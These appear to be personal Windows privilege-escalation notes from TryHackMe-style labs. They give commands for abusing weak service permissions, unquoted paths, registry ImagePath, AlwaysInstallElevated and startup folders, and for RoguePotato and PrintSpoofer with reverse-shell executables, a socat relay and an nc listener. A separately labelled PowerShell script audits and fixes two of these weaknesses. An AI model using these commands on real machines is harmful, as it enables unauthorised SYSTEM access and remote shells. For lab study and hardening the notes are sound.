Windows

Credits - TryHackMe and many more [Will try my best to mention them :) ]...

- Registry: HKLM is for all users, HKCU is for the current user.
- Check the security groups of the current user:

whoami /Groups
net user <username>

1. Insecure Service Permissions

C:\PrivEsc\accesschk.exe /accepteula -uwcqv user <service=daclsvc>
sc qc <service=daclsvc>
# The service runs elevated: SERVICE_START_NAME : LocalSystem
sc config <service=daclsvc> binpath="<path-to-reverse-shell>"
sc start <service=daclsvc>

2. Unquoted Service Path

sc qc unquotedsvc
accesschk.exe -d "C:\Program Files\Unquoted Path Service\"
copy reverse.exe "C:\Program Files\Unquoted Path Service\Common"
sc start unquotedsvc

3. Weak Registry Permissions

- NT AUTHORITY\INTERACTIVE = all logged-in users
- REG_EXPAND_SZ : an expandable data string
- REG_SZ : this data type has a fixed length

sc qc regsvc
accesschk.exe -k <registry-entry-for-service>
accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
reg add <registry-entry-for-service> /v ImagePath /t REG_EXPAND_SZ /d <path-to-rshell>

4. Insecure Service Executables

5. Registry Autoruns [Todo]

6. Registry AlwaysInstallElevated

Set the AlwaysInstallElevated value to "1" (0x1) under both of the following registry keys:

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
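The script below audits a host for items 2 (unquoted service paths) and 6 (AlwaysInstallElevated) from the administrator's side and offers a quoting fix for item 2. It is an added example, not part of the original notes or of any of the credited sources; it assumes an elevated PowerShell session on the host under review, and the function names are my own.

```powershell
# Added hardening audit for items 2 (unquoted service paths) and 6
# (AlwaysInstallElevated); not part of the original notes. Run in an
# elevated PowerShell on the host being reviewed.

function Get-UnquotedServicePath {
    # The SCM resolves an unquoted ImagePath containing spaces by trying each
    # space-delimited prefix as "<prefix>.exe" before the real binary, so the
    # directory holding each prefix needs a write-ACL review (accesschk -d).
    foreach ($svc in Get-CimInstance Win32_Service) {
        $path = $svc.PathName
        if (-not $path -or $path.TrimStart().StartsWith('"')) { continue }
        # Drop arguments: keep everything up to and including the first ".exe".
        $exe = ($path -split '\.exe', 2)[0] + '.exe'
        if ($exe -notmatch ' ') { continue }
        $parts = $exe -split ' '
        $tried = for ($i = 1; $i -lt $parts.Count; $i++) {
            ($parts[0..($i - 1)] -join ' ') + '.exe'
        }
        [pscustomobject]@{
            Service = $svc.Name; RunsAs = $svc.StartName
            ImagePath = $path;  TriedFirst = $tried
        }
    }
}

function Repair-UnquotedServicePath {
    # Remediation for a service reported above: quote the executable (supports -WhatIf).
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$Service)
    $key  = "HKLM:\SYSTEM\CurrentControlSet\Services\$Service"
    $path = (Get-ItemProperty $key -Name ImagePath).ImagePath
    $exe, $rest = $path -split '(?<=\.exe)', 2   # split right after ".exe"
    $fixed = '"{0}"{1}' -f $exe, $rest
    if ($PSCmdlet.ShouldProcess($Service, "set ImagePath to $fixed")) {
        Set-ItemProperty $key -Name ImagePath -Value $fixed -Type ExpandString
    }
}

function Test-AlwaysInstallElevated {
    # The policy is live only when BOTH hives hold AlwaysInstallElevated = 1.
    $state = @{}
    foreach ($hive in 'HKLM', 'HKCU') {
        $state[$hive] = (Get-ItemProperty "${hive}:\Software\Policies\Microsoft\Windows\Installer" `
            -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    }
    [pscustomobject]@{ HKLM = $state.HKLM; HKCU = $state.HKCU
                       Enabled = ($state.HKLM -eq 1 -and $state.HKCU -eq 1) }
}

Get-UnquotedServicePath | Format-List; Test-AlwaysInstallElevated
```

Run `Repair-UnquotedServicePath -Service <name> -WhatIf` first to see the rewritten ImagePath before committing it; fixing AlwaysInstallElevated means setting the value to 0 or removing it in both hives.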

7. Passwords in Registry

8. Retrieve password from SAM SYSTEM registry hives

- The SAM registry is not accessible (a direct query fails):

reg query HKLM\SAM\SAM
ERROR: Access is denied.

9. If creds are saved from a previous user [run exe from a folder which belongs to the admin/higher privilege user]

10. Pass the Hash (pth)

11. Task running at regular intervals

Append "path-to-exec" at the end of the PowerShell script the task runs

12. Insecure GUI Apps

File > Open > navigation pane > C:\Windows\System32\cmd.exe

13. Startup Apps [createshortcut.vbs]

Add a shortcut to the reverse executable in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

14. RoguePotato Attack

• You need a compromised account on the victim machine with Impersonate privileges

s0 - whoami /priv [SeImpersonatePrivilege is Enabled]
s1 - sudo socat TCP-LISTEN:135,reuseaddr,fork TCP:<IP of target>:9999
s2 - nc -nlvp <port-used-in-reverse-exec>
s3 - when running as "nt authority\local service":

RoguePotato.exe -r <IP of attacker> -e "<path-to-exec>" -l 9999

- Run as a local service "nt authority\local service":

C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" "C:\Windows\System32\cmd.exe"
-or-
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

15. PrintSpoofer

PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i

- Tools

winpeasany.exe
seatbelt.exe all full
sharp.exe audit
JAWS [works in the presence of AV solutions]

- Powerup

- List of Exploitable Privileges

- SeImpersonate
